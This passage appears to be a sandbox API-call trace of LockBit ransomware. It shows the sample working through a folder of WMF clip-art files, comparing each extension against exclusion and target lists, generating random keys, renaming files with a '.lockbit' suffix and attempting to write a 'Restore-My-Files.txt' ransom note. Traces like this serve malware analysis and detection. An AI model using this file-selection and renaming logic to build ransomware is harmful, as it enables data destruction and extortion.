lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.382] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.383] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.383] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.383] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.383] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.383] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.383] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.383] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.383] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0149481.WMF") returned 1 [0196.383] lstrcmpiW (lpString1="ntldr", lpString2="J0149481.WMF") returned 1 [0196.383] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0149481.WMF") returned 1 [0196.383] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0149481.WMF") returned -1 [0196.383] lstrcmpiW (lpString1="autorun.inf", lpString2="J0149481.WMF") returned -1 [0196.383] lstrcmpiW (lpString1="thumbs.db", lpString2="J0149481.WMF") returned 1 [0196.383] lstrcmpiW (lpString1="iconcache.db", lpString2="J0149481.WMF") returned -1 [0196.383] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.383] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149481.WMF") returned=".WMF" [0196.383] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.383] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.383] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.383] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.383] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.383] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.383] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.383] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.383] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.383] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.383] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.384] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.384] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.384] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.384] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.384] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.384] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.384] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.384] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.384] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.384] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.384] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.384] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.384] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.384] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.384] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.384] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.384] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.384] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149481.WMF.lockbit") returned 70 [0196.384] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149481.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0149481.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.386] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.386] malloc (_Size=0x40068) returned 0x3df0008 [0196.386] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=24282) returned 1 [0196.386] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.386] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.387] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.387] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.387] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.392] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149481.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149481.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.392] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.392] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.394] free (_Block=0x1fa2ed8) [0196.394] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149481.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.394] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.394] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.394] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fe3f700, ftCreationTime.dwHighDateTime=0x1bd5067, ftLastAccessTime.dwLowDateTime=0xbd4548c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3fe3f700, ftLastWriteTime.dwHighDateTime=0x1bd5067, nFileSizeHigh=0x0, nFileSizeLow=0xa80a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0149627.WMF", cAlternateFileName="")) returned 1 [0196.394] lstrcmpiW (lpString1=".", lpString2="J0149627.WMF") returned -1 [0196.394] lstrcmpiW (lpString1="..", lpString2="J0149627.WMF") returned -1 [0196.394] PathFindExtensionW (pszPath="J0149627.WMF") returned=".WMF" [0196.394] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.394] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.394] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.394] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.394] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.394] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.394] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.394] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.394] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.394] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.394] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.395] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.395] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.396] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.396] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.396] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.396] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.396] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.396] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.396] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.396] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.396] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.396] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0149627.WMF") returned 1 [0196.396] lstrcmpiW (lpString1="ntldr", lpString2="J0149627.WMF") returned 1 [0196.396] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0149627.WMF") returned 1 [0196.396] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0149627.WMF") returned -1 [0196.396] lstrcmpiW (lpString1="autorun.inf", lpString2="J0149627.WMF") returned -1 [0196.396] lstrcmpiW (lpString1="thumbs.db", lpString2="J0149627.WMF") returned 1 [0196.396] lstrcmpiW (lpString1="iconcache.db", lpString2="J0149627.WMF") returned -1 [0196.396] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.396] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149627.WMF") returned=".WMF" [0196.396] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.396] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.396] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.396] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.396] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.396] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.396] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.396] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.396] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.396] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.397] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.397] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.397] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.397] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.397] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.397] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.397] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.397] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.397] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.398] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.398] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.398] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.398] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.398] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.398] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.398] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.398] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.398] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.399] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149627.WMF.lockbit") returned 70 [0196.399] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149627.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0149627.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.400] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.400] malloc (_Size=0x40068) returned 0x3df0008 [0196.400] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=43018) returned 1 [0196.400] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.401] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.401] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.401] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.401] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.405] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149627.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149627.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.405] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.405] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.407] free (_Block=0x1fa2ed8) [0196.407] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149627.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.407] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.407] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.408] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9dd2e700, ftCreationTime.dwHighDateTime=0x1bd6439, ftLastAccessTime.dwLowDateTime=0xbd4548c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x9dd2e700, ftLastWriteTime.dwHighDateTime=0x1bd6439, nFileSizeHigh=0x0, nFileSizeLow=0x1ffa, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0149887.WMF", cAlternateFileName="")) returned 1 [0196.408] lstrcmpiW (lpString1=".", lpString2="J0149887.WMF") returned -1 [0196.408] lstrcmpiW (lpString1="..", lpString2="J0149887.WMF") returned -1 [0196.408] PathFindExtensionW (pszPath="J0149887.WMF") returned=".WMF" [0196.408] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.408] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.408] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.408] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.408] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.408] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.408] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.408] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.408] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.408] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.408] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.408] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.408] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.408] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.408] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.408] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.408] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.408] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.408] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.408] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.409] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.409] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.410] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0149887.WMF") returned 1 [0196.410] lstrcmpiW (lpString1="ntldr", lpString2="J0149887.WMF") returned 1 [0196.410] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0149887.WMF") returned 1 [0196.410] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0149887.WMF") returned -1 [0196.410] lstrcmpiW (lpString1="autorun.inf", lpString2="J0149887.WMF") returned -1 [0196.410] lstrcmpiW (lpString1="thumbs.db", lpString2="J0149887.WMF") returned 1 [0196.410] lstrcmpiW (lpString1="iconcache.db", lpString2="J0149887.WMF") returned -1 [0196.410] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.410] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149887.WMF") returned=".WMF" [0196.410] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.410] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.410] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.410] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.410] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.410] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.410] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.410] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.410] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.410] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.410] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.410] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.410] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.410] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.410] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.411] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.411] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.411] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.411] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.411] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.411] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.411] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.411] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.411] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.411] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.411] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.411] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.411] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.411] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149887.WMF.lockbit") returned 70 [0196.411] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149887.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0149887.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.414] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.414] malloc (_Size=0x40068) returned 0x3df0008 [0196.414] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8186) returned 1 [0196.414] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.414] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.414] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.415] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.415] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.420] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149887.WMF.lockbit", 